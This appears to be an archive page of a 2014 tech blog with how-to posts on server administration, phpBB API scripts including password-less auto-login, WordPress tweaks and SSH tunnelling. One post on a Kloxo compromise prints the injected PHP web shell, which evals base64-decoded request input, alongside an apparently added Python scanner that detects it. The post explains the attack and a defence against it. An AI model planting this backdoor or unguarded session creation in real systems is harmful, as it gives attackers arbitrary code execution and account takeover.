Wednesday, December 10, 2014

How To Secure Roundcube Installation Of Virtualmin



Roundcube is an open source webmail client written in PHP that allows users to read and send email through a user-friendly interface.

Thursday, November 13, 2014

How to Disable InnoDB On MySQL 5.5 and MariaDB


Disabling InnoDB

InnoDB is a MySQL storage engine. As of MySQL 5.5, InnoDB is the default storage engine instead of MyISAM.
Disabling InnoDB can be helpful, especially on low-end boxes with a small amount of memory.

Saturday, November 1, 2014

Protecting Owncloud Against Bruteforce Attacks With Fail2ban


ownCloud is a great web application that can be installed on a server and lets you sync and share files, music, movies, calendars and contacts. However, one weakness that ownCloud users face is brute-force attacks against the login page.

Fail2Ban is a program that scans log files for malicious behaviour and updates the firewall rules to ban offending IP addresses for a specified amount of time.

Sunday, October 12, 2014

Installing Varnish With Virtualmin


What is Varnish


Varnish is an HTTP accelerator and caching reverse proxy.

Varnish is usually installed in front of a web server such as Apache or Nginx and caches its content so that it can be delivered quickly when a request is made.

Tuesday, September 9, 2014

phpBB API - Accessing Database and Performing Sql Queries


In my two previous posts, phpBB API - Logging In And Logging Out a User and phpBB API - Auto Login a User Without a Password, I used the phpBB API to log in a user without a password and to log out a user.

In this post, I will use the phpBB API to run SQL queries against the phpBB database to change a user's password and to mark a user as verified.

Changing a User's Password

<?php
define('IN_PHPBB', true); // Must be defined before including phpBB files
$phpbb_root_path = '../phpBB3/'; // your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);

function phpbbChangePassword($username, $newPassword)
{
    global $db, $table_prefix;

    // phpBB stores a salted hash of the password, never the plain text
    $passwordHash = phpbb_hash($newPassword);

    // Escape both values through phpBB's DBAL so that a crafted username
    // cannot change the meaning of the query
    $sql = "UPDATE `" . $table_prefix . "users`
            SET user_password = '" . $db->sql_escape($passwordHash) . "'
            WHERE username = '" . $db->sql_escape($username) . "'";
    $db->sql_query($sql);
}

// Changing the password for user "Test"
$username = "Test";
$newPassword = "myNewPassword";
phpbbChangePassword($username, $newPassword);

?>

Changing a User's Status to Verified

<?php
define('IN_PHPBB', true); // Must be defined before including phpBB files
$phpbb_root_path = '../phpBB3/'; // your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);

function phpbbVerifyUser($username)
{
    global $db, $table_prefix;

    // USER_NORMAL is phpBB's integer constant for a regular, active account
    $userType = (int) USER_NORMAL;

    // Escape the username so it cannot alter the query
    $sql = "UPDATE `" . $table_prefix . "users`
            SET user_type = " . $userType . "
            WHERE username = '" . $db->sql_escape($username) . "'";
    $db->sql_query($sql);
}

// Verifying user "Test"
$username = "Test";
phpbbVerifyUser($username);

?>



Any questions, please let me know!

Friday, August 15, 2014

phpBB API - Auto Login a User Without a Password



In my previous post, phpBB API - Logging In And Logging Out a User, I showed how to log a user in to a phpBB forum using their username and password.

However, in some cases you may want to log a user in without having or knowing their password.

The phpBB API provides a method to auto-login users given only their phpBB user ID.
This can be useful if you have a website connected to a phpBB forum and you only store the usernames or IDs in that database, or if you are implementing a Facebook Login button on your website and want to synchronise the session with your phpBB forum.

<?php
define('IN_PHPBB', true); // Must be defined before including phpBB files
$phpbb_root_path = '../phpBB3/'; // your forum directory location
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);

// Creates a phpBB session for the given user ID without checking a password.
// Only call this after your own application has already authenticated the
// user (site login, Facebook login, ...); otherwise anyone who can reach
// this script can log in as any user.
function phpbbAutoLogin($id)
{
    global $phpbb_root_path, $phpEx, $user;

    $user->session_kill(false);        // Log the current user out - for testing
    $user->session_begin();            // Start a session
    $user->session_create((int) $id);  // Create a session for this user ID

    // Check whether the user was logged in successfully
    if ($user->data['is_registered'] == 1 && $user->data['user_type'] != USER_INACTIVE && $user->data['user_type'] != USER_IGNORE)
    {
        echo $user->data['username'] . ' has logged in';
    }
    else
    {
        echo 'Error Logging In';
    }
}

// Auto-login the user with phpBB user ID 52
phpbbAutoLogin(52);
?>

Questions? Please let me know!

Monday, August 4, 2014

phpBB API - Logging In And Logging Out a User



What is PHPBB3

phpBB is open source forum software that is very easy to use for building communities. Most importantly, it's totally free.

phpBB3 provides an API that can be used to automatically log in a user from a PHP script.

Although most of the phpBB API functions are documented, the wiki lacks examples, so it can be a little difficult to get started.

If you would like to synchronise your website with a phpBB forum, you can use phpBB sessions to authenticate users.

Include The Following

define('IN_PHPBB', true); //To be allowed to access the API files
$phpbb_root_path = '../phpBB3/'; //phpbb forum path
$phpEx = substr(strrchr(__FILE__, '.'), 1);
require_once($phpbb_root_path . 'common.' . $phpEx);
require_once($phpbb_root_path . 'includes/functions_display.' . $phpEx);

Logging in a User

function phpbbLogin($username, $password)
{
    global $phpbb_root_path, $phpEx, $user, $auth;

    $user->session_begin();   // Start (or resume) the phpBB session
    $auth->acl($user->data);  // Load the permissions of the current user

    // Third argument: set a persistent "remember me" login cookie
    $auth->login($username, $password, true);

    // On success phpBB has replaced the guest session with the user's own
    if ($user->data['is_registered'] == 1 && $user->data['user_type'] != USER_INACTIVE && $user->data['user_type'] != USER_IGNORE)
    {
        echo 'User is logged in';
    }
}

Logging out a User

function phpbbLogout()
{
    global $phpbb_root_path, $phpEx, $user;
    $user->session_kill(false); // Destroy the session; false = do not start a new guest session
    echo 'User is logged out';
}


Questions? Please ask!

Tuesday, June 24, 2014

New Google Registrar Offering Domain Registration



Google announced today that it will be offering domain registrations.

The domain registration is currently still in beta, and is invite only.

You can apply for an invite by following this link:

Domain name registration will cost $12 per year for a .com, with free private WHOIS and DNS among other features.

In addition, customers will get up to 100 email addresses for their domain name and will be able to forward them to an existing email account.

Big competitors like GoDaddy will be facing a problem, especially since Google will be offering up to 100 free subdomains.

Google will also allow customers to manage all kinds of records, such as A, AAAA, CNAME, MX, NS, PTR, SOA, SPF, SRV and TXT, to configure TTLs and to manage the nameservers.


Do you think Google domain registration will compete with GoDaddy and the other big registrars?

Sunday, June 1, 2014

Renaming Saved Images In WP Robot 4


WP Robot is a WordPress plugin that automatically fetches content from websites, social media and RSS feeds and posts it to your WordPress website.

Besides scraping the content, WP Robot can also save the images locally. However, the saved image's file name remains the same as that of the aggregated image.

Modifying The Code

I will modify the WP Robot code to save all images to the server with the following format: title-websiteUrl-randomNumber

Open wp-content/plugins/WPRobot4/func.php, around line 29.

Replace
$file_array['name'] = basename($matches[0]);
with
$path_parts = pathinfo($matches[0]);
$file_array['name'] = str_replace(" ", "-", strtolower(get_the_title($insert))) . '-' . str_replace('http://', "", get_site_url()) . '-' . rand(0, (int) (time() / 1000)) . "." . $path_parts['extension'];

Changing the image file name to reflect the post title can help SEO in image search, since search engines have fewer textual clues there than in normal searches.


Any questions? Leave your comment below!

Thursday, May 1, 2014

Adding Facebook Open Graph (OG) Meta Tags On Blogger



Adding Open Graph meta tags for Facebook is straightforward.

Go to the Blogger Dashboard => Template => Edit HTML

At the top of the code, find the <html> tag; it should look similar to this:
<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>

Add the Facebook XML namespace by adding the following attribute inside the tag (before the > character):
xmlns:og='http://ogp.me/ns#'
So the html tag should look similar to:
<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr' xmlns:og='http://ogp.me/ns#'>

Before the </head> tag, paste the following:
<!-- Open Graph Meta Tags BEGIN -->
<meta expr:content='data:blog.pageName' property='og:title'/>
<b:if cond='data:blog.postImageUrl'>
  <meta expr:content='data:blog.postImageUrl' property='og:image'/>
</b:if>
<meta expr:content='data:blog.title' property='og:site_name'/>
<meta expr:content='data:blog.canonicalUrl' property='og:url'/>
<b:if cond='data:blog.metaDescription'>
  <meta expr:content='data:blog.metaDescription' property='og:description'/>
</b:if>
<!-- Open Graph Meta Tags END -->


That's it! Before testing your page on Facebook, make sure to run it through the Facebook debugger so that your blog's info is re-cached:
https://developers.facebook.com/tools/debug


Also please note that many blogs provide the wrong information by using "data:blog.postImageThumbnailUrl" instead of "data:blog.postImageUrl", which results in the following error in the Facebook debugger:

Provided og:image is not big enough. Please use an image that's at least 200x200 px.

To prevent this, use the code above and make sure you have a picture in your blog post that is at least 200x200 pixels.

Monday, April 28, 2014

Hiding Your IP Address Using SSH Tunneling Tutorial




So you want to hide your IP address without using a VPN or turning your server into a proxy.

This tutorial will show you how to tunnel your internet traffic from your browser to your server.

Requirements:

  1. Your own server with SSH access.
  2. PuTTY (Download PuTTY)

Creating a Tunnel:

Open PuTTY and enter the IP address or host name and the corresponding port number (replace xxx.xxx.xxx.xxx with your IP):

PuTTY Session

Click on SSH => Tunnels on the left side under Category:
PuTTY Tunneling

Enter an unused local port number in "Source port", choose "Dynamic" under "Destination" and click "Add":

PuTTY Tunneling Port

Go back to "Session" under Category, enter a name in "Saved Sessions" and save it. This step is not required, but it's useful for loading the settings and opening the tunnel quickly the next time you want to create a tunnelling connection:

PuTTY Save Settings

Click "Open" in PuTTY, then go to your browser (I'll use Firefox): "Tools" => "Options" => "Advanced" => "Network" => "Settings".
Choose "Manual proxy configuration", enter "localhost" in the SOCKS Host field and enter the port you used in PuTTY (in the screenshots above it's 33000). Make sure to choose "SOCKS v5":
Firefox Proxy Socks 5

Click OK, then go to whatismyipaddress.com and you should see your server's IP address instead of your network's IP.

Happy Tunneling!


Any questions or suggestions? Please leave a comment below!





Tuesday, January 28, 2014

Kloxo Compromised & Hacked With an SQL Injection Vulnerability


Kloxo is a free, open source web hosting platform that helps a server administrator manage web servers, database servers, DNS servers and much more through a graphical user interface.

Kloxo is now outdated; the last update was issued over two years ago.

After zPanel turned out to be vulnerable last month, it seems that Kloxo, another free control panel, is today's victim.

According to VPSBoard, compromised Kloxo servers are spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDoS.

Affected servers have their Kloxo installations compromised through an SQL injection in the webcommand.php file, which grants the attacker Kloxo admin access.

The attacker then injects a file called default.php into every Kloxo account through display.php and changes the owner of default.php to root.

The injected default.php contains the following code:
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
The code above takes a base64-encoded request parameter supplied by the attacker, decodes it and executes it on the server with eval(), so anyone who knows the parameter name can run arbitrary PHP on the host; any other request simply gets an "Access denied." page. Just imagine all the fun you can have with someone's server if you are able to execute any command you wish.
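To find this kind of backdoor on a server you administer, here is an added example (not from the original post or from Kloxo) that scans PHP source for the eval(base64_decode($_REQUEST[...])) pattern shown above, with the silenced error reporting and unlimited execution time reported as corroborating indicators. The file paths and contents are constructed samples.

```python
import re
from typing import Dict, List

# Indicators taken from the injected default.php quoted in the post.
# The eval/decode pattern is the decisive one; the other two are common in
# web shells but also appear in legitimate code, so they only corroborate.
_EVAL_DECODE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)
_SILENCE = re.compile(r"error_reporting\s*\(\s*(?:NULL|0)\s*\)", re.I)
_NO_LIMIT = re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I)


def scan_php_source(src: str) -> List[str]:
    """Return the names of the indicators found in one PHP file's source."""
    hits = []
    if _EVAL_DECODE.search(src):
        hits.append("eval(base64_decode($_REQUEST[...]))")
    if _SILENCE.search(src):
        hits.append("error_reporting silenced")
    if _NO_LIMIT.search(src):
        hits.append("set_time_limit(0)")
    return hits


def triage(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map path -> indicators for files carrying the eval/decode backdoor."""
    findings = {}
    for path, src in files.items():
        hits = scan_php_source(src)
        if hits and hits[0].startswith("eval("):
            findings[path] = hits
    return findings


# Constructed samples: the backdoor as quoted in the post, a legitimate file
# that happens to call base64_decode on request data, and a plain page.
SAMPLES = {
    "/home/site1/default.php": (
        "<?php\nset_time_limit(0);error_reporting(NULL);\n"
        "if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL)"
        "{eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}\n"
        "else{echo 'Access denied.';}\n?>"
    ),
    "/home/site2/lib/token.php": "<?php\n$raw = base64_decode($_POST['token']);\nreturn json_decode($raw, true);\n",
    "/home/site3/index.php": "<?php\necho 'hello';\n",
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLES).items():
        print(path, "->", ", ".join(hits))
```

On a real host, feed triage() the contents of every .php file under the web root and also check who owns each default.php, since the post notes the attacker chowns the file to root.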

As a security measure, it's advised to remove your Kloxo control panel and replace it with an up-to-date panel.

A good, easy to use free control panel that has been gaining a lot of popularity lately is VestaCP.
If you want a more complex free control panel to manage your virtual hosts and servers, you can always go with Virtualmin.


Monday, January 6, 2014

Connecting to VNC Server Securely With Putty On Windows




In my previous post Installing VNC Server on CentOS, I showed you how to install, configure and connect to a VNC server on CentOS. However, that connection from the client to the server is not secure: the password is sent to the server in plain text over an unencrypted channel.

To secure the VNC connection and encrypt all the data sent, SSH tunnelling can be used so that nothing travels in plain text between the client and the server.

An SSH tunnel can easily be created with PuTTY on Windows. PuTTY can be downloaded from here.

Open PuTTY and enter the IP address or hostname of the server:
Putty Open Session

Go to SSH => Auth => Tunnels, enter the IP address and port number of your VNC server and click Add.
Note: all VNC display ports have the form 590X, where X is the display number you defined on your server in /etc/sysconfig/vncserver. In my example, I'll assume I assigned the number 5, so the port in PuTTY will be 5905. (Make sure you replace xxx.xxx.xxx.xxx with your real server IP or hostname.)

Putty Tunneling Configuration

Now either click "Open", or go back to "Session" and save the session so that you don't have to re-enter the information every time.
After clicking Open, log in to your server and make sure your VNC server is installed and started:
service vncserver restart

Open your VNC Viewer client, enter your localhost IP (always 127.0.0.1) followed by the display number (5 in my case), and click Connect:

vnc viewer

Enter your VNC password and click OK. Your connection to the server should be tunneled and secured.



Any questions or suggestions? Please leave a comment below!



Sunday, January 5, 2014

Renaming Locally Saved Image Names In FeedWordPress Advanced Filters




FeedWordPress Advanced Filters

FeedWordPress Advanced Filters (FAF) is a WordPress plugin that extends the FeedWordPress plugin. FAF has many useful features, such as removing specific keywords or HTML tags, saving images locally with or without a predefined size, setting featured images and much more.

When images are saved locally, they keep their original name from the source website. Sometimes that name consists of random characters, a long series of numbers or the source website's name.

Modifying The Code

All of this can be changed easily by modifying one line of code. What I'm going to do is change the name of the image to the following format:

postTitle-websiteName-randomNumber.ImgExtension
For example:
Renaming-Locally-Saved-Image-Names-tech-and-dev-123.jpg

To apply the changes, open /wp-content/plugins/faf/filters/image_filters.php with a text editor, and scroll down to line 423 (in version 0.6), or search for the following line:

$filename = $pathinfo["filename"] . "." . $imgext;

And change it to:

$filename = strtolower(str_replace(" ", "-", $post["post_title"])) . '-' . str_replace('http://', "", get_site_url()) . '-' . rand(0, (int) (time() / 1000)) . "." . $imgext;

Save the file and upload if necessary.

The first part names the image after the post title, lowercased and with spaces replaced by dashes. The second part appends the website URL without the http:// part. The third part generates a random number bounded by the current time. The fourth part appends the image extension to the file name.

This method can also help on-page SEO by giving the images a clear and descriptive name.

Any questions? Please leave your comment below!